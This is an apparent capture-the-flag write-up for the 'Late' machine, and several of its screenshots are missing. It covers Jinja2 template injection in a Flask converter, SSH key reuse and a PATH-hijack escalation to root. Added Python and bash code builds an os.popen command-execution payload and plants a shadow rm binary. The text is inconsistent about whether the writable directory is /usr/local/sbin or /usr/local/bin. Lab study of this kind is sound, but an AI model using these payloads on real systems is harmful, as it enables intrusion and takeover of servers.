Late
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
late.htb
images.late.htb
The converter looks susceptible to SSTI (server-side template injection). The page says it is built with Flask, and Flask renders templates with Jinja2.
Typed a test payload into a LibreOffice document and screenshotted it for the converter:
Results:
Changed the payload:
Results:
Initial Foothold
Achieved remote code execution:
In LibreOffice Writer (Ctrl+Shift+J toggles full screen):
Downloaded result:
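The two steps above (confirming that the converter evaluates what it reads, then turning that into command execution) are the standard Jinja2 SSTI workflow. The following Python is an added example, not code from the write-up or from the converter: it builds the probe payloads, classifies a target from its responses, and assembles the escalation payload. The sample responses are constructed here, not captured from late.htb; the function names are this example's own. On the application side the fix is to hand the extracted text to the template as a variable (render_template("page.html", text=text)) instead of building template source out of it, so that text can never reach the engine as code.

```python
"""SSTI probing for the Flask converter: added example, not code from the
original write-up or from the converter itself.  The responses below are
constructed to look like what a Jinja2 page would return; nothing here
talks to late.htb."""
import secrets


def probe_payloads(a=None, b=None):
    """Return (payload, expected_output_if_evaluated) pairs.

    The arithmetic probe multiplies two three-digit factors (random unless
    given) so that a stray '49' already on the page cannot masquerade as
    an evaluated {{7*7}}.  The second probe relies on Python semantics:
    Jinja2 renders {{7*'7'}} as '7777777', while Twig renders it as 49.
    """
    if a is None:
        a = secrets.randbelow(900) + 100
    if b is None:
        b = secrets.randbelow(900) + 100
    return [
        ("{{%d*%d}}" % (a, b), str(a * b)),
        ("{{7*'7'}}", "7777777"),
    ]


def classify(baseline, responses, payloads):
    """Decide what the target did with the probes.

    baseline  - body returned for a harmless input
    responses - {payload: body} for each probe in payloads
    Returns one of: jinja2-like, twig-like, evaluated-unknown-engine,
    reflected-only, not-reflected.
    """
    arith, strmul = payloads

    def evaluated(payload, expected):
        body = responses.get(payload, "")
        # the value must be new: present after the probe, absent before
        return expected in body and expected not in baseline

    if evaluated(*arith):
        if evaluated(strmul[0], "7777777"):
            return "jinja2-like"
        if evaluated(strmul[0], "49"):
            return "twig-like"
        return "evaluated-unknown-engine"
    if any(p in responses.get(p, "") for p, _ in payloads):
        return "reflected-only"   # echoed verbatim, no template evaluation
    return "not-reflected"


def jinja2_rce(cmd):
    """Build the Jinja2 payload used once evaluation is confirmed.

    `self` is always defined inside a Jinja2 template; walking from its
    __init__ into the module globals reaches __builtins__ and hence
    __import__, so no application object has to be exposed to the
    template for this to work.
    """
    return ("{{self.__init__.__globals__.__builtins__.__import__('os')"
            ".popen(%r).read()}}" % cmd)


def demo():
    """Constructed run-through of the write-up's scenario."""
    payloads = probe_payloads(123, 456)
    baseline = "<pre>hello from the converter</pre>"
    # constructed responses, shaped like a Jinja2 page would render them
    responses = {
        payloads[0][0]: "<pre>56088</pre>",
        payloads[1][0]: "<pre>7777777</pre>",
    }
    return classify(baseline, responses, payloads)


if __name__ == "__main__":
    print(demo())                 # jinja2-like
    print(jinja2_rce("id"))
```

Because the converter takes an image rather than a text field, each payload string is what gets typed into the LibreOffice document and screenshotted; the classification logic is the same once the body comes back.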
Found an SSH private key in svc_acct's .ssh directory alongside its public key. Copied id_rsa.pub into authorized_keys, copied the private key out, and used it to SSH in as svc_acct.
User.txt Proof Screenshot
Privilege Escalation
LinPEAS shows a file in /usr/local/sbin that is writable by svc_acct. The directory itself is also writable by svc_acct.
Contents of ssh-alert.sh:
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
The script is a PAM hook: when PAM_TYPE is open_session it emails root, so every SSH login produces a mail.
Ran pspy to verify:
pspy shows the script being removed and a fresh copy put in its place.
The job doing this calls rm by bare name rather than by full path, so rm is resolved through PATH, and the writable /usr/local/sbin is searched before /usr/bin, where the real rm lives.
Created a reverse shell named rm and placed it in the /usr/local/bin/ directory (like /usr/local/sbin, it precedes /usr/bin in the default PATH).
RootScreenshot Here:
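The check and the plant step above, as an added example that is not the write-up's own reverse shell: hijackable_dirs lists the PATH entries that are writable by the current user and are searched before the directory holding the real binary (any output means the name can be shadowed), and plant_shadow drops a stand-in that logs the call and then execs the real binary, so the privileged job keeps working and nothing breaks while you wait for it to fire. The function names are this example's; the reverse shell from the write-up would go where the logging line is. The fix on the job's side is to call /usr/bin/rm and friends by absolute path, or to set PATH explicitly at the top of the script.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): find out whether a command
# that a privileged job calls by bare name can be shadowed through PATH, and
# plant a wrapper that proves it while keeping the job working.

# hijackable_dirs NAME
# Print every PATH entry that (a) is searched before the directory holding the
# real NAME and (b) is writable by the current user.  Any line of output means
# a file named NAME placed there runs instead of the real one.
hijackable_dirs() {
    local name=$1 real realdir dir
    real=$(command -v "$name") || return 1   # where the lookup ends today
    realdir=${real%/*}
    local IFS=:
    for dir in $PATH; do
        [ -z "$dir" ] && dir=.               # an empty entry means cwd
        [ "$dir" = "$realdir" ] && break     # entries after the real one never win
        [ -d "$dir" ] && [ -w "$dir" ] && printf '%s\n' "$dir"
    done
    return 0
}

# plant_shadow NAME DIR REAL
# Write DIR/NAME: a stand-in that records who ran it with which arguments and
# then execs REAL so the calling job still succeeds.  In the write-up this is
# the spot where the reverse shell went; the logging stub keeps the demo
# harmless and leaves the job's behaviour intact.
plant_shadow() {
    local name=$1 dir=$2 real=$3
    cat > "$dir/$name" <<EOF
#!/bin/sh
printf '%s %s\\n' "\$(id -un)" "\$*" >> '$dir/$name.log'
exec '$real' "\$@"
EOF
    chmod 755 "$dir/$name"
    hash -r                                  # forget the shell's cached lookup
}

# Usage: bash path_hijack.sh rm   -> prints writable dirs that shadow rm
if [ "${1-}" ]; then
    hijackable_dirs "$1"
fi
```

Run hijackable_dirs with the PATH of the process that performs the lookup, not your own: a job started by systemd or PAM inherits that service's PATH, which is what decides whether /usr/local/sbin or /usr/local/bin is consulted before /usr/bin.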